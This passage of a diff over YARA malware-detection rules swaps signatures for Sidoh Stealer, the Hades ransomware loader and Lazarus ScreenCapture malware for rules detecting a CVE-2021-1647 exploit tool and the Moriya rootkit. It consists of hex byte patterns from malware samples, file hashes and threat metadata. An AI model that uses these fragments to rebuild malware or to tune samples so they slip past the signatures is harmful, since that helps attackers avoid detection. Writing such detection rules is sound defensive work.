61 00 ba 34 00 00 00 be 40 00 00 00 c6 44 24 50 c6 48 89 c7 c6 44 24 51 3b c6 44 24 52 16 c6 44 24 53 01 c6 44 24 54 92 c6 44 24 55 36 c6 44 24 56 81 c6 44 24 57 c8 c6 44 24 58 f3 c6 44 24 59 49 c6 44 24 5a a8 c6 44 24 5b 02 c6 44 24 5c 6f c6 44 24 5d 9d c6 44 24 5e db c6 44 24 5f 61 c6 44 24 60 8a c6 44 24 61 e3 c6 44 24 62 f4 c6 44 24 63 1b c6 44 24 64 33 c6 44 24 65 4d c6 44 24 66 b4 c6 44 24 67 00 c6 44 24 68 f4 c6 44 24 69 76 c6 44 24 6a 70 c6 44 24 6b 56 c6 44 24 6c e2 c6 44 24 6d f3 c6 44 24 6e 5c c6 44 24 6f 73 c6 44 24 70 06 c6 44 24 71 de c6 44 24 72 c5 c6 44 24 73 fa c6 44 24 74 4c c6 44 24 75 7b c6 44 24 76 34 c6 44 24 77 b9 c6 44 24 78 d3 c6 44 24 79 a6 c6 44 24 7a 9b c6 44 24 7b 03 c6 44 24 7c f7 c6 44 24 7d 8e c6 44 24 7e 37 c6 44 24 7f 6a c6 84 24 80 00 00 00 3a c6 84 24 81 00 00 00 97 c6 84 24 82 00 00 00 57 c6 84 24 83 00 00 00 25 c6 84 24 84 00 00 00 2c c6 84 24 85 00 00 00 ac c6 84 24 86 00 00 00 a6 c6 84 24 87 00 00 00 de c6 84 24 88 00 00 00 29 c6 84 24 89 00 00 00 ca c6 84 24 8a 00 00 00 c0 c6 84 24 8b 00 00 00 93 c6 84 24 8c 00 00 00 67 c6 84 24 8d 00 00 00 47 c6 84 24 8e 00 00 00 8d c6 84 24 8f 00 00 00 }
+		$s1 = { 6a 16 58 0f be c8 88 85 b0 fe ff ff c7 85 d8 fe ff ff 42 73 7a 73 c7 85 dc fe ff ff 71 64 77 7b c7 85 e0 fe ff ff 38 73 6e 73 c6 85 e4 fe ff ff 00 e8 aa 73 ff ff 89 85 94 }
+		$s2 = "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s" ascii
+		$s3 = { b8 c9 11 47 00 e8 c3 c5 01 00 68 f8 d7 47 00 33 db 53 53 ff 15 cc 20 47 00 53 50 89 85 d0 fc ff ff ff 15 d0 20 47 00 85 c0 0f 85 92 02 00 00 6a 01 ff 15 8c 22 47 00 84 c0 79 f4 53 e8 e2 aa 00 00 50 e8 1e 98 00 00 8b 35 84 22 47 00 8d 85 ec fe ff ff 59 59 50 53 53 6a 1c 53 ff d6 8d 8d ec fe ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 ec fe ff ff 51 50 b9 f0 5b 48 00 e8 bf 0e 00 00 8d 85 e8 fd ff ff 50 68 04 01 00 00 ff 15 40 20 47 00 8d 8d e8 fd ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e8 fd ff ff 51 50 b9 08 5c 48 00 e8 89 0e 00 00 8d 85 e4 fc ff ff 50 53 53 6a 1a 53 ff d6 8d 8d e4 fc ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e4 fc ff ff 51 50 b9 90 5b 48 00 e8 57 0e 00 00 8b fb 89 9d dc fc ff ff 8b f3 89 bd d4 fc ff ff 89 b5 d8 fc ff ff 83 65 fc 00 33 c9 6a 16 5a 41 e8 71 05 ff ff 8b cf 89 85 e0 fc }
+		$s4 = { 6a 01 ff 15 98 22 47 00 85 c0 74 5d 6a 00 ff 15 a0 22 47 00 85 c0 74 51 56 6a 01 ff 15 94 22 47 00 8b f0 85 f6 74 3b 56 ff 15 38 21 47 00 8b d0 85 d2 74 27 8b ca 57 8d 79 01 8a 01 41 84 c0 75 f9 2b cf 6a 03 51 8b 0d 6c 72 48 00 52 ba 58 d7 47 00 e8 95 1b fe ff 83 c4 0c 5f 56 ff 15 64 21 47 00 }
+		$s5 = { 81 ec 14 02 00 00 a1 0c 50 48 00 33 c5 89 45 fc 53 56 8b d9 be 19 27 00 00 57 8b 7d 0c 83 fb ff 75 0c e8 bb eb ff ff 89 37 89 47 04 eb 17 ff 75 08 52 53 ff 15 bc 22 47 00 85 c0 8b cf 0f 95 c2 e8 b8 fe ff ff e8 98 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 75 08 81 3f 34 27 00 00 74 20 e8 80 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 0f 85 b9 00 00 00 81 3f 33 27 00 00 0f 85 ad 00 00 00 83 fb ff 75 0c e8 5b eb ff ff 89 37 e9 99 00 00 00 33 c0 89 9d f8 fd ff ff 40 89 9d fc fe ff ff 89 85 f4 fd ff ff 89 85 f8 fe ff ff 8d 85 f8 fe ff ff 6a 00 50 8d 85 f4 fd ff ff 50 6a 00 8d 43 01 50 ff 15 d8 22 47 00 8b f0 8b cf 85 f6 0f 98 c2 e8 2a fe ff ff 85 f6 78 53 83 a5 f0 fd ff ff 00 8d 85 ec fd ff ff 50 8d 85 f0 fd ff ff c7 85 ec fd ff ff 04 00 00 00 50 68 07 10 00 00 68 ff ff 00 00 53 ff 15 b0 22 47 00 8b f0 8b cf 85 f6 0f 95 c2 e8 e8 fd ff }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 10KB and 3 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Sidoh_Stealer_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_EXP_CVE_2021_1647_Apr_2021_1 : CVE_2021_1647 FILE
 {
 	meta:
-		description = "Detect Sidoh Stealer used by RYUK group"
+		description = "Detect CVE-2021-1647 tool "
 		author = "Arkbird_SOLG"
-		id = "b4661304-6dfa-5c33-95f2-8694271b9e58"
-		date = "2021-08-31"
-		modified = "2021-09-01"
-		reference = "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-31/Sidoh/MAL_Sidoh_Stealer_Aug_2021_1.yara#L1-L22"
+		id = "c4c14d22-adf8-51b1-b898-7e253447824f"
+		date = "2021-05-04"
+		modified = "2021-05-05"
+		reference = "-"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-04/CVE-2021-1647/EXP_CVE_2021_1647_Apr_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "baeea14c6be42d64d3ca68298bf6ced34c9587fcda91471945cfc7ed1fe267bd"
+		logic_hash = "58f16973f68b1b792f6f1575b6a3f386493d033767ee97e48a33044e3ddc3426"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		hash1 = "a1ce52437252001b56c9ccd2d2da46240dc38db8074a5ed39a396e8c8e387fc2"
-		hash2 = "c64269a64b64b20108df89c4f1a415936c9d9923f8761d0667aa8492aa057acb"
-		hash3 = "e6762cb7d09cd90d5469e3c3bfc3b47979cd67aa06c06e893015a87b0348c32c"
-		hash4 = "cc4a0b4080844e20fb9535679f7b09a3e2449729ce1815d1e5a64272b0225465"
-		tlp = "White"
-		adversary = "RYUK (RAAS)"
+		tags = "CVE-2021-1647, FILE"
+		hash1 = "6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788"
+		hash2 = "9eaea8a56c47524f6d6b2e2bb72d035c1aa782a4f069ef9df92a0af5c6ee612b"
+		hash3 = "db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7"
+		hash4 = "24d9ff44affea06435829507e8e6cb4b659468aa2af510031ed963caf5a6d77a"
+		tlp = "Green"
+		adversary = "-"
 
 	strings:
-		$s1 = { 68 88 13 00 00 ff 15 ?? 30 41 00 ff 76 04 ff 15 ?? 30 41 00 68 10 27 00 00 53 68 ?? f6 41 00 e8 ?? ?? 00 00 83 c4 0c ff 15 ?? 30 41 00 8b f8 8b f3 8b d7 8b ce d3 ea f6 c2 01 74 34 8d 46 41 6a 3a 66 a3 ?? f6 41 00 58 66 a3 ?? f6 41 00 33 c0 68 ?? f6 41 00 66 a3 ?? f6 41 00 ff 15 ?? 30 41 00 83 f8 05 74 0a b9 ?? f6 41 00 e8 ?? ?? 00 00 46 83 fe 1a 7c bb 68 10 27 00 00 53 68 ?? f6 41 00 e8 ?? ?? 00 00 8b 3d ?? 30 41 00 8d 44 24 28 83 c4 0c 89 5c 24 1c 6a 01 50 53 ff d7 8b 35 ?? 30 41 00 6a 04 68 00 10 00 00 ff 74 24 24 53 ff d6 8b d8 8d 44 24 1c 6a 01 50 53 89 5c 24 30 ff d7 6b 0b 18 6a 04 68 00 10 00 00 51 33 c9 51 ff d6 68 00 40 00 00 6a 40 89 44 24 38 ff 15 ?? 30 41 00 33 f6 89 44 24 2c 89 74 24 }
-		$s2 = { 8b ca c1 e9 02 f3 a5 8b ca 83 e1 03 f3 a4 33 f6 56 56 56 6a 01 56 ff 15 ?? 31 41 00 a3 ?? ?? 42 00 8b fe 85 c0 74 4e 56 68 00 00 00 08 6a 01 68 ?? ?? 41 00 68 ?? ec 41 00 6a 15 ff 75 f8 50 ff 15 ?? 31 41 00 8b f8 85 ff 74 42 56 6a 02 8d 85 f0 fc ff ff 50 53 57 ff 15 ?? 31 41 00 85 c0 75 0f ff 15 ?? 30 41 00 8b d8 a1 ?? ?? 42 00 eb 08 a1 ?? ?? 42 00 33 db 43 8b 35 ?? 31 41 00 50 ff d6 57 ff d6 8b c3 5f 5e 5b 8b e5 }
-		$s3 = { 55 8b ec 83 ec 58 53 8b 1d ?? 30 41 00 56 57 6a 04 68 00 10 00 00 6a 02 6a 00 89 55 f0 8b f1 ff d3 8b f8 85 ff 75 08 83 c8 ff e9 0f 01 00 00 56 68 ?? ?? 41 00 57 e8 93 ff ff ff 83 65 f8 00 8d 45 f8 50 6a 00 57 ff 15 ?? 31 41 00 83 c4 18 8b f0 83 7d f8 00 89 75 f4 74 04 6a fd eb 33 83 65 ac 00 8d 45 ac 50 ff 15 ?? 31 41 00 8d 45 ac 50 6a 00 68 ?? ?? 41 00 56 ff 15 ?? 31 41 00 83 c4 14 83 7d c8 00 77 10 72 06 }
-		$s4 = { 6a 04 68 00 10 00 00 ff 75 c4 6a 00 ff d3 8b d8 85 db 75 1a 68 00 80 00 00 50 57 ff 15 ?? 30 41 00 56 ff 15 ?? 31 41 00 59 6a fb 58 eb 79 6a 00 68 ?? ?? 41 00 56 ff 15 ?? 31 41 00 ff 75 c8 8b f0 ff 75 c4 53 56 ff 15 ?? 31 41 00 56 ff 15 ?? 31 41 00 ff 75 f4 ff 15 ?? 31 41 00 ff 75 08 8b 55 c4 8b cb ff 75 f0 e8 3b 02 00 00 8b f0 83 c4 2c 85 f6 75 14 83 7d 08 05 75 0e 8b 55 c4 51 8b cb e8 b3 09 00 00 59 8b f0 68 00 80 00 00 6a 00 53 ff 15 ?? 30 41 00 68 00 80 00 00 6a 00 57 ff 15 ?? 30 41 00 8b c6 5f 5e 5b 8b e5 }
+		$seq1 = { 83 7d ec 01 0f 8e fe 76 ff ff 83 45 f4 01 83 7d f4 01 0f 8e e4 76 ff ff 8b 45 e4 89 04 24 e8 12 74 ff ff 83 ec 04 a1 [2] 01 b1 85 c0 75 0e 8b 45 e4 89 04 24 e8 fb 73 ff ff 83 ec 04 a1 28 ?? 01 b1 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 08 b8 00 00 00 00 c9 c2 04 00 55 89 e5 83 ec 10 c7 45 f4 00 ?? 01 70 8b 45 08 83 e8 01 a3 70 ?? 01 b1 c7 05 74 ?? 01 b1 00 00 00 00 c7 05 a0 ?? 02 b1 00 00 00 00 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 }
+		$seq2 = { a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 75 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc c7 45 f8 00 00 00 00 eb 19 8b 45 f8 05 e2 ff ff 7f 8d 14 00 8b 45 fc 01 d0 66 c7 00 01 00 83 45 f8 01 83 7d f8 3b 7e e1 8b 45 fc }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 20KB and all of ( $s* )
+		filesize > 10KB and all of them
 }
-rule ARKBIRD_SOLG_Ran_Loader_Hades_Dec_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Moriya_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect the loader used by Hades ransomware for load the final implant in memory"
+		description = "Detect Moriya rootkit used in the TunnelSnake operation"
 		author = "Arkbird_SOLG"
-		id = "d48d3a2b-3f0f-5da2-aba9-db2366489a6c"
-		date = "2020-12-27"
-		modified = "2021-01-01"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-01/Hades/Ran_Loader_Hades_Dec_2020_1.yar#L2-L24"
+		id = "6a78ddc0-b39f-5aec-9c54-980854173abf"
+		date = "2020-05-07"
+		modified = "2021-05-26"
+		reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_1.yara#L1-L27"
 		license_url = "N/A"
-		logic_hash = "cfa0f8acd3c526f7f4889794f7c38547a88031bb615a03ad5c1542c61bc0eecd"
-		score = 50
-		quality = 71
+		logic_hash = "f73049f261428c8921a2c8a86fb5d242719e5dc9f30a5c58e86be1a79d84a42d"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		hash1 = "0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00"
-		hash2 = "ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d"
-		level = "Experimental"
+		hash1 = "3eda93de4a1e7a35c040fad914a4885d079ffc3c1362153b74e10ff9121de22b"
+		hash2 = "d620f9c32adc39b0632f22ec6a0503bf906fd1357f4435463fbb4b422634a536"
+		tlp = "White"
+		adversary = "Chinese APT Group"
 
 	strings:
-		$seq1 = { 48 83 ec 58 8b 0d 9e aa 1c 00 ba 01 14 00 00 ff 15 93 9a 1c 00 48 85 c0 74 07 33 c0 e9 c1 3b 00 00 48 8b 05 58 99 1c 00 48 89 44 24 30 c7 44 24 3c 2c 01 00 00 c7 44 24 38 01 00 00 00 33 c9 ff 15 cb 99 1c 00 48 89 05 74 aa 1c 00 48 8b 05 6d aa 1c 00 48 63 48 3c 48 8b 05 62 aa 1c 00 48 03 c1 48 89 05 88 aa 1c 00 48 8d 44 24 3c 48 89 44 24 28 48 8d 05 a7 aa 1c 00 48 89 44 24 20 4c 8d 4c 24 38 45 33 c0 48 8d 15 53 aa 1c 00 48 8b 0d e4 ac 1c 00 ff 54 24 30 48 85 c0 74 05 e8 5e ff ff ff 48 8d 05 2d 3d 00 00 48 89 05 38 aa 1c 00 48 8b 05 31 aa 1c 00 }
-		$seq2 = { 89 54 24 10 89 4c 24 08 48 83 ec 18 8b 44 24 20 89 04 24 8b 44 24 28 89 44 24 04 8b 44 24 04 39 04 24 73 0f c7 44 24 20 04 00 00 00 8b 04 24 eb 0e eb 0c c7 44 24 20 35 00 00 00 8b 44 24 04 48 83 c4 18 }
-		$seq3 = { 48 8b 05 c1 ?? 1c 00 48 89 05 32 ?? 1c 00 }
-		$s1 = "111111111\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}" fullword wide
-		$s2 = "_VERSION_INFO" fullword wide
-		$s3 = "VkKeyScanW" fullword ascii
-		$s4 = { 53 43 61 4d 69 72 }
+		$seq1 = { 4c 8d 05 13 10 00 00 ff 15 95 12 00 00 48 8d 15 36 10 00 00 48 8d 4d c0 ff 15 fc 12 00 00 48 8d 15 65 10 00 00 48 8d 4d d0 ff 15 eb 12 00 00 48 8d 05 cc 23 00 00 41 b9 22 00 00 00 48 89 44 24 30 4c 8d 45 c0 c6 44 24 28 00 33 d2 83 64 24 20 00 48 8b cb ff 15 f0 11 00 00 33 d2 41 8b ce 8b f8 85 c0 79 09 4c 8d 05 6e }
+		$seq2 = { 4c 8d 05 85 10 00 00 ff 15 27 12 00 00 48 8b 05 80 23 00 00 48 8d 55 c0 48 8d 4d d0 83 48 30 04 ff 15 be 11 00 00 e8 c5 01 00 00 33 d2 41 8b ce 85 c0 79 0c }
+		$seq3 = { 33 db 48 8b 74 24 30 4c 8b 7c 24 38 48 8b 7c 24 40 4c 8b 64 24 48 4d 8b ec 48 8d 4c 24 58 ff 15 b7 1c 00 00 48 8b 46 10 49 89 44 24 f8 48 8b 46 08 49 89 45 f0 41 80 65 bb 0f 8a 46 18 24 0f 41 08 45 bb 4c 8b 4e 08 }
+		$seq4 = { 48 83 64 24 58 00 ba 44 5c 00 00 c7 44 24 50 79 00 00 00 41 b9 76 00 00 00 c7 44 24 48 78 6f 00 00 41 b8 69 72 00 00 c7 44 24 40 72 70 00 00 c7 44 24 38 69 00 00 00 c7 44 24 30 73 6e 00 00 c7 44 24 28 5c 00 00 00 c7 44 24 20 72 65 00 00 e8 03 f6 ff ff 48 8d 55 80 48 8d 4c 24 70 ff 15 74 17 00 00 48 8d 05 2d 28 00 00 45 33 c9 48 89 44 24 38 45 33 c0 48 8b 05 eb 16 00 00 48 83 64 24 30 00 c6 44 24 28 00 41 8d 51 40 48 8b 08 48 89 4c 24 20 48 8d 4c 24 70 ff 15 d9 16 00 00 85 c0 78 31 48 8b 0d ee 27 00 00 48 8b 81 e0 00 00 00 48 89 05 d8 27 00 00 48 8d 05 19 f7 ff ff 87 81 e0 00 00 00 48 8b 0d cc 27 00 00 ff 15 c6 16 00 00 33 c0 48 8b 4d 00 48 33 cc e8 58 0b 00 00 48 81 c4 10 01 00 }
+		$seq5 = { 40 55 53 56 57 41 56 48 8d ac 24 40 ff ff ff 48 81 ec c0 01 00 00 48 8b 05 47 1e 00 00 48 33 c4 48 89 85 b8 00 00 00 48 83 64 24 38 00 49 8b d8 48 83 64 24 50 00 48 8b fa 48 8b f1 33 d2 41 b8 c8 00 00 00 48 8d 4c 24 60 4d 8b f1 e8 0b 06 00 00 33 c0 48 8d 4d 30 0f 57 c0 48 89 85 b0 00 00 00 33 d2 0f 11 85 90 00 00 00 44 8d 40 58 0f 11 85 a0 00 00 00 e8 e2 05 00 00 0f 10 07 48 83 64 24 20 00 48 8d 05 72 f8 ff ff 48 89 44 24 40 48 8d 54 24 28 48 8d 05 81 fd ff ff 4d 8b c6 48 8b cb 48 89 44 24 48 f3 0f 7f 44 24 28 e8 13 05 00 00 8b d8 85 c0 0f 88 da 00 00 00 0f 10 07 48 8b 0d f7 1f 00 00 48 8d 05 30 0a 00 00 45 33 c9 48 89 45 40 f3 0f 7f 45 30 45 33 c0 48 8d 55 30 0f 10 06 48 89 45 48 f3 0f 7f 45 70 e8 22 05 00 00 8b d8 85 c0 0f 88 93 00 00 00 0f 10 06 83 65 c0 00 48 8d 05 14 0a 00 00 0f 10 0d 5d 0f 00 00 83 a5 a0 00 00 00 00 48 8d 54 24 60 48 8b 0d 9a 1f 00 00 45 33 c9 f3 0f 7f 45 a0 48 89 44 24 70 45 33 c0 0f 10 07 48 89 44 24 78 48 8d 85 90 00 00 00 48 89 45 d8 48 8d 44 24 20 f3 0f 7f 45 e4 c7 45 e0 03 50 00 00 0f 10 05 ff 0e 00 00 c7 45 d0 01 00 00 00 f3 0f 7f 8d 90 00 00 00 c7 85 a8 00 00 00 00 01 00 00 f3 0f 7f 45 b0 48 89 85 b0 00 00 00 e8 91 04 00 00 8b d8 85 c0 79 08 41 8b 0e e8 35 04 00 00 8b c3 48 8b 8d b8 00 00 00 48 33 cc e8 96 02 00 00 48 81 c4 c0 01 00 00 41 5e 5f 5e 5b }
+		$s1 = "Moriya : NotifyFunction\n" fullword ascii
+		$s2 = "Moriya Filter" fullword wide
+		$s3 = "Moriya : DeviceControlDispatch!\n" fullword ascii
+		$s4 = "Moriya : Waiting...\n" fullword ascii
+		$s5 = "Moriya : WriteDispatch!\n" fullword ascii
+		$s6 = { 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e }
+		$s7 = { 5c 00 44 00 6f 00 73 00 44 00 65 00 76 00 69 00 63 00 65 00 73 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e }
+		$s8 = "Moriya start\n" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and 2 of ( $seq* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( 3 of ( $seq* ) or 6 of ( $s* ) )
 }
-rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Screencapture_June_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Moriya_May_2021_2 : FILE
 {
 	meta:
-		description = "Detect ScreenCapture malware used by Lazarus APT"
-		author = "Arkbird_SOLG, James_inthe_box"
-		id = "bb0463ac-6219-5a12-b3d2-fc82800bda69"
-		date = "2020-06-23"
-		modified = "2021-07-13"
-		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L3-L31"
+		description = "Detect Moriya rootkit used in the TunnelSnake operation"
+		author = "Arkbird_SOLG"
+		id = "25cecff1-94f9-5e8d-8758-9b891e9d7373"
+		date = "2020-05-26"
+		modified = "2021-05-27"
+		reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_2.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "66f8d3da0f70f6c4ed6f853ab4040d7f96c043e9e194f1720999b48910b3e756"
+		logic_hash = "11ef00940604c3337b1c8c00903297343cfd4e8f3899b949d58e4203ab68d3fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8"
+		hash1 = "ce21319bd21f76ab0f188a514e8ab1fe6f960c257475e45a23d11125d78df428"
+		tlp = "White"
+		adversary = "Chinese APT Group"
 
 	strings:
-		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\ScreenCapture_Win32_DllRelease.pdb" fullword ascii
-		$s2 = "CloseHandle ScreenCaptureMutex failure! %d" fullword ascii
-		$s3 = "ScreenCapture_Win32_DllRelease.dll" fullword ascii
-		$s4 = "ScreenCaptureMutex already created! %s\n" fullword ascii
-		$s5 = "Capturing screen...\n" fullword ascii
-		$s6 = "%s\\P%02d%lu.tmp" fullword ascii
-		$s7 = "ScreenCaptureThread finished!" fullword ascii
-		$s8 = "ScreenCaptureThread started!" fullword ascii
-		$s9 = "ScreenCapture start time set to %llu" fullword ascii
-		$s10 = "ScreenCaptureMutex already created! %s\n" fullword ascii
-		$s11 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
-		$s12 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
-		$s13 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
-		$s14 = "[END] ScreenCaptureThread terminated!" fullword ascii
-		$s15 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
-		$s16 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
-		$s17 = "Entered Windows direcotry, skipping..." fullword ascii
-		$s18 = "Found %d entries." fullword ascii
+		$seq1 = { 8b 35 c4 30 40 00 8d 45 dc 68 92 24 40 00 50 ff d6 68 cc 24 40 00 8d 45 e4 50 ff d6 68 58 42 40 00 57 57 6a 22 8d 45 dc 50 57 53 ff 15 5c 30 40 00 8b f0 85 f6 0f 88 0a ff ff ff a1 58 42 40 00 83 48 1c 04 8d 45 dc 50 8d 45 e4 50 ff 15 60 30 40 00 e8 b2 00 00 00 }
+		$seq2 = { 68 3c 24 40 00 50 ff 15 c4 30 40 00 8d 85 d8 fe ff ff 50 ff 15 bc 30 40 00 85 c0 74 1b 8d 8d e0 fe ff ff 51 ff d0 8b 8d e4 fe ff ff 8b 85 e8 fe ff ff 0f b7 5d f4 eb 28 53 8d 85 cc fe ff ff 50 8d 85 d4 fe ff ff 50 8d 85 d0 fe ff ff 50 ff 15 ac 30 40 00 8b 8d d0 fe ff ff 8b 85 d4 fe ff ff c1 e1 08 0f b6 c0 0b c1 0f b6 cb }
+		$seq3 = { 8b 75 c0 8d 45 cc 50 ff 15 94 30 40 00 8b 5d c8 8b 43 0c 8b 55 bc 89 42 20 8b 43 08 89 42 1c 80 62 03 0f 8a 43 10 24 0f 08 42 03 8b 4b 08 85 c9 74 30 80 7e 24 00 74 06 f6 43 10 20 75 17 8b 46 18 85 c0 78 0a f6 43 10 40 75 0a 85 c0 79 20 f6 43 10 80 74 1a ff 73 0c 56 ff 75 b4 ff d1 8b f8 eb 0d 80 7e 21 00 74 07 8b 46 60 80 48 03 01 68 74 6e 68 00 53 ff 15 b4 30 40 00 }
+		$seq4 = { 6a 79 68 78 6f 00 00 68 72 70 00 00 6a 69 68 73 6e 00 00 6a 5c 68 72 65 00 00 6a 76 68 69 72 00 00 68 44 5c 00 00 50 e8 a2 f8 ff ff 83 c4 30 8d 85 7c ff ff ff 50 8d 85 6c ff ff ff 50 ff 15 c4 30 40 00 a1 88 30 40 00 68 34 42 40 00 56 56 ff 30 8d 85 6c ff ff ff 56 56 6a 40 50 ff 15 90 30 40 00 }
